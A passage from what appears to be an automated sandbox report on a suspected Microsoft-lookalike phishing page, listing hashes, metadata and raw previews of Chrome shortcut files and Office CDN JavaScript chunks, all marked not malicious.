                                         which is'microsoft.com'. The presence of a 'dev' top-level domain suggests a development or testing environment,
                                         but it does not guarantee legitimacy. The sign-in form and Microsoft logo are common features,
                                         but they can be easily replicated by a phishing site. The lack of a clear association between the brand and the domain raises suspicions.",
                                        "brand_matches":[false],
                                        "url_match":false}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 15:27:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2673
                                        Entropy (8bit):3.9825529528801344
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CCE45160150081A5766A288C64E528B1
                                        SHA1:8C99B4326CD26365715868B36691AEA1FE6FEDBA
                                        SHA-256:DEC4C3D7DFBD2DBC45BD9BFF54466CD3EC9F402E6403FD3113AAC835C922A591
                                        SHA-512:0886C3A71131CF0DF7315708C5955F4A25272EA118F8C1B5C9368D7FC621017A3AB6A033A2AD3B45F3BC10EC4A1D553973602FCAB0D9CA18BD982F57BE1E3CBD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,......).....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Yd............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 15:27:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2675
                                        Entropy (8bit):3.998252673381879
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BF47750FB7F102231AD15192B6F65E14
                                        SHA1:C1FEE073D53E44AD5ADF5A17FAC7456F8ADF8AF8
                                        SHA-256:DA0055FBF50B2C2EC1D84F76D7D8694250A480D17A76A26FFDA934D79D0E2359
                                        SHA-512:AE4DC4E01684148431F9CB8DEBA2839882F6BFDBBD15BBA9066D78C347FE0182126381FF652CD7EED7938EC8CA90491695B69C53A62DBFE686BC54A7B64E52D6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....O.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Yd............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2689
                                        Entropy (8bit):4.005257467124159
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4624EB0EF25E1FB5B2A517A07AD309E6
                                        SHA1:92BE7E12570D87EFE2CB38E1A7DED8965488BA4C
                                        SHA-256:671428B30CEB828C44CA8C61A494FC8A267A90D56CD66046A1CAB8B3D582C31A
                                        SHA-512:99805C5F3953B3112CB3A72ADA535E3E26C9C720DA32E44AF14AB6FD063AD18810D44CBC8F59F72A404901E05F695470036D42DA8297683EA258C317F54061A2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 15:27:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.998175870318274
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BFF2B318AAA73856E57935E5FB48F277
                                        SHA1:EFAD903FD75A9B1DBDB4168A178B73284790D363
                                        SHA-256:B7E4B406CF66059CA3AB84B8B968CA42C289EA590E01E95C900F2458E49A4702
                                        SHA-512:9A58FE25446C0F73AB03DEF3B00AB8B95B3F6D1BB180F3E92E0C8F63BAD546E5A18D4B84FD4A584A7CF5EC18E7D7A5E92AA515CDCB89C6C63A1C572D82063E3A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Yd............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 15:27:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9857372830109967
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4649FB7A4634CE08ED6EC492F57790B8
                                        SHA1:F9D28CDB5B57FDE2F27C627B68F7164FC0B9D3BA
                                        SHA-256:747760D436E83EA624DD5F37B53FFFB83D3B8BBF0E9B1CAB9E81CD96DD44F529
                                        SHA-512:21ECB8C16160FB49D25C654F8B3E4D394E58B46E0D7A7DC3F90E255609D7D58BB05E736B8053171EC207F3341D383ED186A9B641B68F0F44C5787462291ACBAE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,......#.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Yd............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 15:27:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):3.995706443658172
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:36D5A6E3E1CC5ACE3C41DAB84B8F41CC
                                        SHA1:864BEBBF8A00778B5C1982B44B10171011F8C6C0
                                        SHA-256:4A55649261F987EEC00A876CF3E207B93F7B81DAEDBB990D69650D494A09EB1A
                                        SHA-512:D712EBA211C809FF8650AB1671CF9E450BDE2327F3D0D9BC23B6835FE86C97CCAFA45F9265D95A519BA05EABF6929E970D27977A4D485CB9E92F7AABCF124E46
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....0......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YW.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Yb.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Yb.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Yb............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Yd............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (35504)
                                        Category:downloaded
                                        Size (bytes):36086
                                        Entropy (8bit):5.395264939007949
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:62E449D90AAF4D4849B51382E29F6879
                                        SHA1:2CC9D33DBAFEA1064779FC662380794BE5B6012E
                                        SHA-256:8F67077C02517A1FEE55CAFEDF6E7E1B566236E874A0A01BCB7B46D44AB24DA0
                                        SHA-512:52D077A61177267E403200716B5F9451163E4F13BBA927B51CD3580696E3C2E8368C7B2EFCAF325C7FF18201D4FE52FE8D910D6E3A482A05F9764DEDC16F39AE
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/318.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[318],{5936:function(e,t,n){n.d(t,{a:function(){return s},b:function(){return c}});var a=n(1),i=n(5937),r=n(902),o=n(25),s=new a.a("itemSetNavCommandGroups",{commandGroups:a.b}),c=new a.a("itemSetNav",{childKeys:a.b,isResolved:a.b,error:a.b,navAs:(0,o.b)(),commandGroupsControlHandler:(0,a.c)(s),selectedKeyControlHandler:(0,a.c)(i.a),navGroupControlHandler:(0,a.c)(r.a)})}.,5937:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(1),i=new a.a("itemSetNavSelectedKey",{currentSelectedKey:a.b})}.,2313:function(e,t,n){n.r(t),n.d(t,{leftNavContentControlHandler:function(){return en}});var a=n("react-lib"),i=n(112),r=n(2104),o=n(902),s=n(5936),c=n(899),d=n("tslib_102"),l=n(3),u=n(68),f=n(22),p=n(5),m=n(114),_=n(903),h=n(904),b=n(1643),g=n(5937),v=n(11),y=n(97),S=n(86),D=n("fui.util_369"),I=(0,D.dY)(function(e){var t=this;return function(n,a){return(0,d.Zd)(t,void 0,void 0,function(){return(0,d.qr)(this,function(t)
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (30298)
                                        Category:downloaded
                                        Size (bytes):139002
                                        Entropy (8bit):5.38198186448589
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2BC3648F33DB1588A78F81D6E4D993C6
                                        SHA1:A7B8AA25FDE53376CE3992D50CF881E3B009DE6C
                                        SHA-256:A9F7AD334511E2515A1E9836C66E0472B4173018EA12FAABD8560101844DC128
                                        SHA-512:A7F75E29E55C20714214DECA85B2EA2B8BB99DA5A2CF387A94926FDB364FF05E0A36B03CC947B51DBE9F06068709BF1EF08630E26188578DDFA08B476DB92452
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://shell.cdn.office.net/shellux/suiteux.shell.mast.cc905ff394285d8dea70.js
                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_mast_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["mast"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),l=e(69988),f=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=l.S);var f=e.propertyStorageOverride;!f||f.getProperty&&f.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,(function(n){i
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7329)
                                        Category:downloaded
                                        Size (bytes):8583
                                        Entropy (8bit):5.291084622404821
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BBCFEC3B591726821866C84FA2C204BE
                                        SHA1:F8D704ADBEB69459F27FE7CA916227A98A9E72C2
                                        SHA-256:0A454E00B750935F210B1014D8A53E8FDA52F1F8C7447DA8E8EF38FD8579BAD1
                                        SHA-512:E34B3F7201B8ECB171426EA142504F01B6F19BD7282DAFBF2D445A84E74AEC5270C185745A8E9815A59564AF76083193658C93798242570A354020838966DB89
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/169.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[169],{3535:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return r},d:function(){return o}});var a="ListsAction",i="SPListAction",r="resetAllSurveyStatuses",o="resetSurveyStatusById"}.,4680:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n(10),r=n(396),o=n(146),s=n(119),c=n(17),d=n(79),l=n("odsp.util_460"),u=n(107),f=n(416),p=n(1376),m=n(1377),_=n(1301),h=l.HW.isActivated("60B05ED0-5912-442F-97BA-70A6BCAF2ADD"),b=l.HW.isActivated("5252DF6C-E868-444D-9381-8A37A145DBA8"),g=l.HW.isActivated("7B6FC2DB-D98E-4399-8BBA-E13E98CA50C4"),v="Not implemented",y=function(){function e(e,t){var n=this;this._campaignDefinitions=[],this._shouldInitFloodgate=function(){return(0,a.Zd)(n,void 0,void 0,function(){var e;return(0,a.qr)(this,function(t){switch(t.label){case 0:return h?[2,!0]:(e=this,[4,this._getFloodgateProperties()]);case 1:return e._floodgateProperties=t.sen
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (9848)
                                        Category:dropped
                                        Size (bytes):10969
                                        Entropy (8bit):5.469391017052839
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E14627307D2CD849E7D11008BED53618
                                        SHA1:52300A7E361A8678A27B0A67E6C4E6871E459117
                                        SHA-256:C275D24C7D1AB3E84314EEF5AB4C4CD7B032BF7910D51C0DC1F010E82B776AD9
                                        SHA-512:0917F12EB12097B9153AA7B2B38A08B0388E3E711C733D76699E708C04793FEA06CFFFD3A0E53C45A00C44BEA1ADDB56E542613BC03BDBE373575C5D090B1D7F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{4634:function(e,t,n){n.d(t,{a:function(){return c}});var a=n(784),i=n(324),r=n(1971),o=n(264),s=n(3786);function c(e){if(e&&0!==e.length){for(var t=[],n=0,c=(0,s.a)(e);n<c.length;n++){var d=c[n],l=d,u=!1;(0,r.a)(l)&&(l=(0,r.b)(l),u=!0);var f=i.a[l];"number"==typeof f&&f>0?t.push(u?-f:f):"folder"===l?t.push(u?i.a["!folder"]:i.a.folder):"media"===l?t.push(u?i.a["!media"]:i.a.media):"onenote"===l?t.push(u?i.a["!onenote"]:i.a.onenote):t.push(d.toUpperCase())}return(0,a.d)({filters:t},{fileTypeIconMap:o.a})}}}.,4632:function(e,t,n){n.r(t),n.d(t,{constructGetItemContext:function(){return z},constructGetItemSetContext:function(){return j},getContentTypes:function(){return G},getFolderContentTypes:function(){return K},getItemContextPostDataContext:function(){return V},spDataSourceConfigurationFacet:function(){return s.rd},spPrefetchDataConfigurationFacet:function(){return s.kd}});var a=n("tslib_102"),i=n(22),r=n
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (42917)
                                        Category:dropped
                                        Size (bytes):211436
                                        Entropy (8bit):5.52724531792186
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:64AD5C4B241F36ABCC01FAF50AAFD996
                                        SHA1:348A224B1789885A56183F2E6294B87467EFC477
                                        SHA-256:6FB13321BA734C66974274D0D682C53F3E1451F9E6FF74514606C12B3197EDFF
                                        SHA-512:E332BE7151291F1C0F5E472561A050D07661824FD5B0F777BFD540D48B6F93F1C00BD4B573C007C36AA2884D5506DE40B7648B1324553AC4109CEA2CEDA438B2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_plus_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["plus"],{65335:function(e,t,n){(t=e.exports=n(90145)(!1)).push([e.id,'.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;border:1px solid hsla(0,0%,100%,0);box-shadow:0 1px 2px 0 rgba(0,0,0,.1);box-sizing:border-box;width:276px;padding-left:0;align-items:flex-start;margin:0 0 17px 16px}html[dir=rtl] .o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={margin-left:0;margin-right:16px}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=:hover{-webkit-box-shadow:0 8px 16px 0 rgba(0,0,0,.1);box-shadow:0 8px 16px 0 rgba(0,0,0,.1)}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=>button{min-width:30px;width:30px;height:36px;paddi
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (13140)
                                        Category:downloaded
                                        Size (bytes):25013
                                        Entropy (8bit):5.409791612323616
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1BF2DAFF3C46072DC6DAEB8B0A220B39
                                        SHA1:B89672BA87E7FDDBE933E5802D1E35F0BD535A26
                                        SHA-256:8D21CDBEC8D595B22F064F751DE0DD3EBC0174A5A2C77BD2B21AF99C857BC887
                                        SHA-512:F278B156B22D2CCA98410B8FDCFE06EF04184220D3FE2CD13EDC6412E47515AD4F671EBD8F84ECE01159246B4425B2FDD865F85A8E427CB902F831F4A909C1C3
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/387.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[387],{2929:function(e,t,n){var a=n(20),i=n(122),r=function(){function e(e){this.concurrency=e||1,this._running=0,this._queue=[],this._promiseComplete=this._promiseComplete.bind(this)}return e.prototype.enqueue=function(e){var t;if(this._running<this.concurrency)this._running++,(t=e()).then(this._promiseComplete,this._promiseComplete);else{var n={callback:e,signal:null,canceled:!1,result:null};n.signal=new i.b(function(){n.canceled=!0,a.c.is(n.result)&&n.result.cancel()}),this._queue.push(n),t=n.signal.getPromise()}return a.c.resolve(t)},e.prototype._promiseComplete=function(){var e=this;if(this._running--,this._running<this.concurrency&&this._queue.length){for(var t=this._queue.shift();t&&t.canceled;)t=this._queue.length?this._queue.shift():null;t&&(this._running++,t.result=t.callback(),t.result.then(function(n){t.signal.complete(n),e._promiseComplete()},function(n){t.signal.error(n),e._promiseComplete()}))}}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (20654)
                                        Category:downloaded
                                        Size (bytes):42451
                                        Entropy (8bit):5.179717741377626
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9C24592089471AF60F7059ABCEF73C59
                                        SHA1:EF86E9BB13678D581B06FC973DB4068CFC7F9D1F
                                        SHA-256:45C65F4C3AD54737349F388DB3487DDC4951BE76C8F3B5C6C1E820869B7CD795
                                        SHA-512:3650386D4A76EA9B635405D3AE1528C56A87C6E6E8CBCED6F2C998254ED8350C1363ACAE2890BEB0BBF3B9ECA160FFBE09EFD184FA652C9C3970658B367392A9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/66.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[66],{5978:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(7934),i=function(){function e(e){this._dataSource=e.sharingDataSource||new a.a({getParentListId:e.getParentListId,pageContext:e.pageContext}),this._itemProvider=e.itemProvider}return e.prototype.getSharingInformation=function(e,t,n,a,i){return this._dataSource.getSharingInformation(e,t,n,a,i,void 0)},e.prototype.getSharingInformationForRMA=function(e,t){return this._dataSource.getSharingInformationForRMA(e,t,void 0)},e.prototype.shareLink=function(e){var t=this;return this._dataSource.shareLink(e).then(function(n){return t._invalidateItem(e.items[0]),n})},e.prototype.unshareLink=function(e){var t=this;return this._dataSource.unshareLink(e).then(function(n){return t._invalidateItem(e.item),n})},e.prototype.updatePermissions2=function(e,t,n){var a=this;return this._dataSource.updatePermissions2(e,t,n).then(function(e){return a._invalidateItem(t),
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (14852)
                                        Category:dropped
                                        Size (bytes):34611
                                        Entropy (8bit):5.215847441326058
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E9950B542F136586F6B9800FAF1792C2
                                        SHA1:55FDE73EF5D04D761F72C5F5DA590E2F0DCD7799
                                        SHA-256:AA19748A46594E7D3BAEC7C2C62BC787A3D77438043CDB4A433C5B57D7FFA65D
                                        SHA-512:F57DDBC5CA15E0A86E4E19E0408BC1ED223B958EAC81A547D3A12AFFFDFA15F22C7EAF070BB175C81B7001D62BC4F1A648B4EE6D934C3C8F00F1B0C5D33751EB
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[267],{5935:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n("odsp.util_460").hK)("metadataSearchDataSource")}.,2175:function(e,t,n){n.r(t),n.d(t,{ENGAGEMENT_ROOT:function(){return i.a},EngagementBuilder:function(){return i.b},EngagementHelper:function(){return s},EngagementPart:function(){return i.d},EngagementPartType:function(){return i.c},clickEngagementPart:function(){return l.a},dropEngagementPart:function(){return l.b},getMostSpecificMatchingContext:function(){return u},keyPressEngagementPart:function(){return l.c},mergeEngagementData:function(){return c}});var a=n("tslib_102"),i=n(663),r=n(35),o=n(86),s=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this,i=n.handlers,o=void 0===i?[]:i,s=n.logData,c=void 0===s?function(e){return r.a.logData(e)}:s;return a._handlers=o,a._logData=c,a}return(0,a.XJ)(t,e),t.prototype.logData=function(e){if(void 0===e&&(e
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (30298)
                                        Category:dropped
                                        Size (bytes):105770
                                        Entropy (8bit):5.392213533794559
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DA6B9B632467EF7189D0EA7A3DC00679
                                        SHA1:F5116345491D55E853F46CA355F7BAC920B5EFBE
                                        SHA-256:8FC9E3D95566966AFD16C726DEFA90826DBAF2DBB17EE3275A18B6E2764B5C19
                                        SHA-512:15340A6BE36902AF6F61C0EC5E29835C2F7CA87FFC745999E117391DDD2145B4FCEDA64AC0261BA5E494D2A0B7CA73DEE6DAA20882E6B45EF9943820289662B7
                                        Malicious:false
                                        Reputation:unknown
